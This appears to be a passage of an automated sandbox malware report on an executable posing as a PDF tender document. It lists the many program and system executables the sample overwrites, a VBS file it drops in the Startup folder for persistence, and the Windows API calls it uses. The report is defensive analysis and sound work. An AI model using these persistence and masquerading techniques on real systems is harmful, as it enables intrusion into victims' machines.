Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\pingsender.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Media Player\wmpnetwk.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\default-browser-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7z.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zG.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\updater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\7-Zip\7zFM.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Au3Info.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to dropped file

Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\snmptrap.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Spectrum.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\Locator.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\AgentService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\VSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbengine.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\wbem\WmiApSrv.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SearchIndexer.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Windows\System32\AppVClient.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\FXSSVC.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\TieringEngineService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\vds.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\OpenSSH\ssh-agent.exe	Jump to dropped file
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	File created: C:\Windows\System32\alg.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\SysWOW64\perfhost.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msiexec.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\SensorDataService.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\msdtc.exe	Jump to dropped file
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	File created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe	Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\recomplaint\mouslingly.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mouslingly.vbs

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Creates files inside the volume driver (system volume information)

Source: C:\Windows\System32\TieringEngineService.exe

File created: C:\System Volume Information\Heat\

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_004048D7
Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe	Code function: 0_2_00485376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00485376

Source: C:\Users\user\Desktop\Supply Tender documents PDF.exe

Code function: 0_2_00423187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00423187

